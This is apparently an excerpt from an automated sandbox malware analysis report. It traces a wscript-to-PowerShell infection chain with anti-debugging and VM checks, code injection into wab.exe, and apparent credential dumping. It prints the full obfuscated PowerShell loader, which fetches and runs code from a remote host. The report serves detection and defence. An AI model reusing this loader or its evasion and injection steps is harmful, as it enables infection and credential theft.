Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Program Files (x86)\Windows Mail\wab.exe API/Special instruction interceptor: Address: 600FA16
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 10_2_0040DD85
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 5677 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4162 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6961 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2774 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 5715 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: threadDelayed 3752 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Window / User API: foregroundWindowGot 1772 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe API coverage: 9.3 %
Source: C:\Windows\System32\wscript.exe TID: 4320 Thread sleep time: -30000s >= -30000s Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7260 Thread sleep time: -1844674407370954s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7420 Thread sleep count: 6961 > 30 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452 Thread sleep time: -4611686018427385s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7424 Thread sleep count: 2774 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7868 Thread sleep count: 243 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7868 Thread sleep time: -121500s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7872 Thread sleep count: 5715 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7872 Thread sleep time: -17145000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7872 Thread sleep count: 3752 > 30 Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7872 Thread sleep time: -11256000s >= -30000s Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_227910F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose, 9_2_227910F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0040AE51 FindFirstFileW,FindNextFileW, 10_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 11_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen, 11_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 12_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen, 12_2_00407898
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_00418981 memset,GetSystemInfo, 10_2_00418981
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWv8
Source: wab.exe, 00000009.00000002.2993796074.00000000065E8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAWX/d
Source: wscript.exe, 00000000.00000003.1717919070.0000027D86D80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\\?\Volume{a33c736e-61ca-11ee-8c18-806e6f6e6963}\
Source: wscript.exe, 00000000.00000003.1717969194.0000027D86CE8000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}I
Source: wscript.exe, 00000000.00000003.1717919070.0000027D86D80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}}
Source: wscript.exe, 00000000.00000003.1712586037.0000027D86D4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1721244381.0000027D86CE9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713309532.0000027D86CC1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717969194.0000027D86CE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717760543.0000027D86D4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713608480.0000027D86CE8000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1721362071.0000027D86D4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1713410944.0000027D86CE8000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.2394644445.0000026CEED94000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 00000009.00000002.2993796074.000000000663B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
Source: wscript.exe, 00000000.00000003.1717919070.0000027D86D80000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: bhv3B88.tmp.10.dr, bhv5123.tmp.13.dr Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: wscript.exe, 00000000.00000003.1712586037.0000027D86D4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.1717760543.0000027D86D4B000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.1721362071.0000027D86D4B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW}6b~
Source: bhv5123.tmp.13.dr Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US
Source: C:\Program Files (x86)\Windows Mail\wab.exe API call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process queried: DebugPort Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_026BD430 LdrInitializeThunk, 4_2_026BD430
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_22792639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_22792639
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle, 10_2_0040DD85
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 10_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW, 10_2_004044A4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_22794AB4 mov eax, dword ptr fs:[00000030h] 9_2_22794AB4
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_2279724E GetProcessHeap, 9_2_2279724E
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_22792639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_22792639
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_22792B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 9_2_22792B1C
Source: C:\Program Files (x86)\Windows Mail\wab.exe Code function: 9_2_227960E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 9_2_227960E2

HIPS / PFW / Operating System Protection Evasion

barindex
Source: Yara match File source: amsi64_5352.amsi.csv, type: OTHER
Source: Yara match File source: Process Memory Space: powershell.exe PID: 5352, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: powershell.exe PID: 7372, type: MEMORYSTR
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 4460000 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 2F0FEF8 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t" Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic Racings Catharin Scampies Circumscribing133 Parolees Maksimumstraffe Nonimportation Paatalernes alfabetiseres Isoimmunizations Dyreryggens73 Silversmiths Suckfish45 Gormandising Synalephe Kldelig Intermediary Octogenarians Jammerklagerne Randrusianskes Statsborgerskabers Arnolds Optimist Aeronautic';If (${host}.CurrentCulture) {$Sinologi++;}Function Gunflints($Handsawfish){$Guvnor=$Handsawfish.Length-$Sinologi;$Beflounce96='SUBsTRI';$Beflounce96+='ng';For( $Fletteprocessers=7;$Fletteprocessers -lt $Guvnor;$Fletteprocessers+=8){$Racings+=$Handsawfish.$Beflounce96.Invoke( $Fletteprocessers, $Sinologi);}$Racings;}function Skildrerne($larrigan){ &($Cumulates) ($larrigan);}$Cryptoglaux=Gunflints 'SlvpapiM Rullego AulostzC,quinaiC acatel TeitmilForzanda Voldsh/unwilt 5Ost.nsi.Prmiere0Glazier Gennems( EmascuW SluppeiPylorosnPolyli d s,ifteoAnalysewConvolvs Intens DamerkkNfngsel.TBedaa e Ptisanr1 Tarrag0 Typif,.Dinguse0.ambesg;Laurent AimilepWSudansaiBestillnAdrenin6.eander4Latesce;Agerdyr A toplaxDiso de6Audi,iv4 Precon; Beregn TvrrebsrTromlervL ftreg: zilasm1Csarre.2 Opsaml1Rringer.Riv nca0Franker)Tilfres systempGUdskregeBawbeescAddendek igua,ooSemenan/ Econo.2Libe ta0 Shaved1Harvard0Bitmnst0Standar1 Trerum0Presump1Subinte By,selvF S,igeriUnrooflrM.nostie Disoccf bservaoFug,ighxTriglyp/Halvoff1Kultu,m2Aut,mob1Klinikk.Haa dva0Triadic ';$spliff=Gunflints 'Bela neUP,oletasKtast.seRejekllrudskyde-GenopleADyffeleg OversteAfskninnEarfulstOmbreaf ';$Parolees=Gunflints 'UdpegelhBlgeb vt Beregnt SyphonpUrfjeld:nicadss/Alufo,i/svingsa1Glycero0 str.tc3Dep,tat.Vavasor2D.alate3Te,rsta7Annegit.Torkild8Doekspr6Svovlha.Fro.tlu2Strutma4Tegneku7Emb,yol/ApplikaUCorticid RejsegmGemotsma Di,selg orskefrIn.ighteResurget Ove,tr.isbaadshHashpibholie orkL kishn ';$Furibund=Gunflints 'Enkelth>Se.opus ';$Cumulates=Gunflints ' SnitfliforladeeMarlinexOverp i ';$Vandrerkorts='Paatalernes';$Onklerne = Gunflints 'Undu eoeFeelingc Skyldnh,dlydskoWastefu Deflor%U.profiaOver,oppOvertrdp d onnidRigstrna GraasttBnketsia rkanst%Garant.\FrescoeFParaff eUngeniaj Ove bad CardioeIngen.odha,lssteGule.dd.PrstegaePlafo,dlShowboalAllinge Meazlef&Bundtet&Phi,ant Ynglerne ManslacLiglotth.heologoRaynard KrampetP.ragra ';Skildrerne (Gunflints ' Fredni$,ccumbmg AkropolMich.elo SkaanebSpisekraUdsivnilDi,xinr: HyssenKFiskeriuP.einstnUnburntd Dis ere.ntermatstamin.jFo tbrieAa.sindnlooeysueMonterisOver,eatRykindeeCetoniin bri.ebsC,shmer=Underbe(electroc runcatmVi.terhdSelvkla Rangkla/Inco.vecXylosma thainto$Korrig OSphac ln cum.lak.esparilUndercheDvlerehrKontraknPa,ralle.dmeasu)Sna Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Fejdede.ell && echo t" Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\gcunaectpsfuvitxczvfdsahw" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\rezgswvvdaxhfwhbljiggfuyfzlyb" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\byfqtofpripmidvfcuvirkhhgovgcyok" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yhgaygccbnmkekwxnjvujyny" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\jjttrynvpvepgykbwuiwulipima" Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\tdzlsryxddwcregfnedpxpcyjtslpk" Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" "cls;write 'racings catharin scampies circumscribing133 parolees maksimumstraffe nonimportation paatalernes alfabetiseres isoimmunizations dyreryggens73 silversmiths suckfish45 gormandising synalephe kldelig intermediary octogenarians jammerklagerne randrusianskes statsborgerskabers arnolds optimist aeronautic racings catharin scampies circumscribing133 parolees maksimumstraffe nonimportation paatalernes alfabetiseres isoimmunizations dyreryggens73 silversmiths suckfish45 gormandising synalephe kldelig intermediary octogenarians jammerklagerne randrusianskes statsborgerskabers arnolds optimist aeronautic';if (${host}.currentculture) {$sinologi++;}function gunflints($handsawfish){$guvnor=$handsawfish.length-$sinologi;$beflounce96='substri';$beflounce96+='ng';for( $fletteprocessers=7;$fletteprocessers -lt $guvnor;$fletteprocessers+=8){$racings+=$handsawfish.$beflounce96.invoke( $fletteprocessers, $sinologi);}$racings;}function skildrerne($larrigan){ &($cumulates) ($larrigan);}$cryptoglaux=gunflints 'slvpapim rullego aulostzc,quinaic acatel teitmilforzanda voldsh/unwilt 5ost.nsi.prmiere0glazier gennems( emascuw sluppeipylorosnpolyli d s,ifteoanalysewconvolvs intens damerkknfngsel.tbedaa e ptisanr1 tarrag0 typif,.dinguse0.ambesg;laurent aimilepwsudansaibestillnadrenin6.eander4latesce;agerdyr a toplaxdiso de6audi,iv4 precon; beregn tvrrebsrtromlervl ftreg: zilasm1csarre.2 opsaml1rringer.riv nca0franker)tilfres systempgudskregebawbeescaddendek igua,oosemenan/ econo.2libe ta0 shaved1harvard0bitmnst0standar1 trerum0presump1subinte by,selvf s,igeriunrooflrm.nostie disoccf bservaofug,ighxtriglyp/halvoff1kultu,m2aut,mob1klinikk.haa dva0triadic ';$spliff=gunflints 'bela neup,oletasktast.serejekllrudskyde-genopleadyffeleg oversteafskninnearfulstombreaf ';$parolees=gunflints 'udpegelhblgeb vt beregnt syphonpurfjeld:nicadss/alufo,i/svingsa1glycero0 str.tc3dep,tat.vavasor2d.alate3te,rsta7annegit.torkild8doekspr6svovlha.fro.tlu2strutma4tegneku7emb,yol/applikaucorticid rejsegmgemotsma di,selg orskefrin.ighteresurget ove,tr.isbaadshhashpibholie orkl kishn ';$furibund=gunflints 'enkelth>se.opus ';$cumulates=gunflints ' snitfliforladeemarlinexoverp i ';$vandrerkorts='paatalernes';$onklerne = gunflints 'undu eoefeelingc skyldnh,dlydskowastefu deflor%u.profiaover,oppovertrdp d onnidrigstrna graasttbnketsia rkanst%garant.\frescoefparaff eungeniaj ove bad cardioeingen.odha,lsstegule.dd.prstegaeplafo,dlshowboalallinge meazlef&bundtet&phi,ant ynglerne manslacliglotth.heologoraynard krampetp.ragra ';skildrerne (gunflints ' fredni$,ccumbmg akropolmich.elo skaanebspisekraudsivnildi,xinr: hyssenkfiskeriup.einstnunburntd dis ere.ntermatstamin.jfo tbrieaa.sindnlooeysuemonterisover,eatrykindeecetoniin bri.ebsc,shmer=underbe(electroc runcatmvi.terhdselvkla rangkla/inco.vecxylosma thainto$korrig osphac ln cum.lak.esparilunderchedvlerehrkontraknpa,ralle.dmeasu)sna
